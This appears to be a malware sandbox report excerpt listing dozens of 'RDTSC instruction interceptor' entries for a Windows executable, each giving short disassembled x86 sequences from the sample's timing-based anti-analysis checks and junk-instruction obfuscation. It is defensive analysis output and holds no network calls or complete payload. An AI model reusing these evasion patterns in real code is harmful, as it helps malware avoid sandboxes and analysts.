Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 376E75 second address: 1CEE86 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F4688C1B76Ah 0x00000011 push edi 0x00000012 jng 00007F4688C1B766h 0x00000018 pop edi 0x00000019 popad 0x0000001a nop 0x0000001b mov ecx, dword ptr [ebp+122D32E3h] 0x00000021 push dword ptr [ebp+122D02D1h] 0x00000027 mov dword ptr [ebp+122D324Dh], edx 0x0000002d call dword ptr [ebp+122D34DBh] 0x00000033 pushad 0x00000034 mov dword ptr [ebp+122D1AD8h], ecx 0x0000003a xor eax, eax 0x0000003c cld 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 jmp 00007F4688C1B779h 0x00000046 mov dword ptr [ebp+122D3B28h], eax 0x0000004c add dword ptr [ebp+122D1AD8h], ebx 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D1AD8h], esi 0x0000005d mov dword ptr [ebp+122D1AD8h], esi 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 clc 0x00000068 lodsw 0x0000006a clc 0x0000006b add eax, dword ptr [esp+24h] 0x0000006f or dword ptr [ebp+122D1AD8h], ebx 0x00000075 mov ebx, dword ptr [esp+24h] 0x00000079 jmp 00007F4688C1B76Ch 0x0000007e nop 0x0000007f pushad 0x00000080 push edx 0x00000081 jmp 00007F4688C1B76Ah 0x00000086 pop edx 0x00000087 push eax 0x00000088 push edx 0x00000089 jmp 00007F4688C1B778h 0x0000008e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 376FAE second address: 376FB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 376FB4 second address: 376FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 376FB8 second address: 1CEE86 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push eax 0x0000000c mov cx, di 0x0000000f pop edx 0x00000010 xor dword ptr [ebp+122D33DCh], edi 0x00000016 push dword ptr [ebp+122D02D1h] 0x0000001c xor cx, 1B3Dh 0x00000021 call dword ptr [ebp+122D34DBh] 0x00000027 pushad 0x00000028 mov dword ptr [ebp+122D1AD8h], ecx 0x0000002e xor eax, eax 0x00000030 cld 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 jmp 00007F4688C929E9h 0x0000003a mov dword ptr [ebp+122D3B28h], eax 0x00000040 add dword ptr [ebp+122D1AD8h], ebx 0x00000046 mov esi, 0000003Ch 0x0000004b mov dword ptr [ebp+122D1AD8h], esi 0x00000051 mov dword ptr [ebp+122D1AD8h], esi 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b clc 0x0000005c lodsw 0x0000005e clc 0x0000005f add eax, dword ptr [esp+24h] 0x00000063 or dword ptr [ebp+122D1AD8h], ebx 0x00000069 mov ebx, dword ptr [esp+24h] 0x0000006d jmp 00007F4688C929DCh 0x00000072 nop 0x00000073 pushad 0x00000074 push edx 0x00000075 jmp 00007F4688C929DAh 0x0000007a pop edx 0x0000007b push eax 0x0000007c push edx 0x0000007d jmp 00007F4688C929E8h 0x00000082 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 377314 second address: 37731A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 377D08 second address: 377D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 377D0C second address: 377D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 377DA8 second address: 377DF4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F4688C929E5h 0x00000010 lea eax, dword ptr [ebp+1247B77Fh] 0x00000016 pushad 0x00000017 mov dword ptr [ebp+124444CEh], esi 0x0000001d mov dword ptr [ebp+124453C9h], esi 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F4688C929E5h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A41E7 second address: 3A41EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A41EB second address: 3A41F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A41F1 second address: 3A41FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A4476 second address: 3A4480 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A4480 second address: 3A448E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F4688C1B76Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A448E second address: 3A44C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F4688C929E6h 0x0000000a ja 00007F4688C929D6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F4688C929DDh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A44C6 second address: 3A44DE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007F4688C1B76Eh 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A44DE second address: 3A44FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 jmp 00007F4688C929DFh 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A48C9 second address: 3A48CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A48CF second address: 3A48D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A4A22 second address: 3A4A34 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F4688C1B76Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A4BFF second address: 3A4C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929E8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ADA31 second address: 3ADA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007F4688C1B766h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 336065 second address: 336077 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F4688C929D6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 336077 second address: 336087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jbe 00007F4688C1B77Ah 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AC336 second address: 3AC33A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AC33A second address: 3AC350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4688C1B770h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AC350 second address: 3AC355 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AC355 second address: 3AC38C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007F4688C1B774h 0x0000000d jmp 00007F4688C1B779h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AC38C second address: 3AC3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4688C929D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jg 00007F4688C929D8h 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007F4688C929D6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AC3AA second address: 3AC3AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AC514 second address: 3AC519 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AC6C3 second address: 3AC6C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ACE49 second address: 3ACE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3ACE4D second address: 3ACE51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AD171 second address: 3AD176 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AD8DB second address: 3AD900 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F4688C1B766h 0x00000009 jmp 00007F4688C1B778h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AD900 second address: 3AD906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3AC094 second address: 3AC099 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B2E1D second address: 3B2E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4688C929D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B2E27 second address: 3B2E2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B2F62 second address: 3B2F72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929DBh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3399 second address: 3B339E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B339E second address: 3B33D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DDh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F4688C929E4h 0x0000000f push edi 0x00000010 pop edi 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 jp 00007F4688C929D6h 0x0000001f pop eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B33D8 second address: 3B33ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4688C1B76Ch 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B33ED second address: 3B342B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E3h 0x00000007 pushad 0x00000008 jno 00007F4688C929D6h 0x0000000e jmp 00007F4688C929E5h 0x00000013 jmp 00007F4688C929DBh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3587 second address: 3B35C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Dh 0x00000007 jnc 00007F4688C1B76Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 js 00007F4688C1B768h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F4688C1B76Eh 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B35C0 second address: 3B35C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B35C8 second address: 3B35D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B385B second address: 3B385F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B385F second address: 3B3863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3863 second address: 3B3897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4688C929E8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C929E4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B39D2 second address: 3B39D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3B89 second address: 3B3B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3B8F second address: 3B3B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F4688C1B77Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3B9C second address: 3B3BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929E1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3BB1 second address: 3B3BB6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3BB6 second address: 3B3BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929DFh 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F4688C929D6h 0x00000015 jmp 00007F4688C929E5h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3BEA second address: 3B3C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F4688C1B766h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3EB4 second address: 3B3EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3B3EBB second address: 3B3EC0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BA8B1 second address: 3BA8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BA8B7 second address: 3BA8D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B776h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BA8D4 second address: 3BA8E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F4688C929DEh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BA8E9 second address: 3BA901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B774h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BA901 second address: 3BA910 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BA910 second address: 3BA917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BA917 second address: 3BA931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929E0h 0x00000009 jns 00007F4688C929D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BA931 second address: 3BA935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BA935 second address: 3BA93B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BAA8E second address: 3BAA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BD20F second address: 3BD213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3BD213 second address: 3BD219 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3C2935 second address: 3C293A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3C2D29 second address: 3C2D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3C2D2D second address: 3C2D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 ja 00007F4688C929D6h 0x0000000f pop ebx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F4688C929D6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 377816 second address: 37781C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37781C second address: 377845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4688C929DAh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C929E6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 377845 second address: 37784B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3C32BC second address: 3C32F4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4688C929D6h 0x00000008 jng 00007F4688C929D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 jmp 00007F4688C929E6h 0x0000001d popad 0x0000001e jng 00007F4688C929F0h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3C32F4 second address: 3C3306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4688C1B766h 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 337B54 second address: 337B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3C672D second address: 3C673C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3CBCF0 second address: 3CBCF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3CBCF9 second address: 3CBCFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3CB23A second address: 3CB266 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4688C929EEh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4688C929DAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3CB3A3 second address: 3CB3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
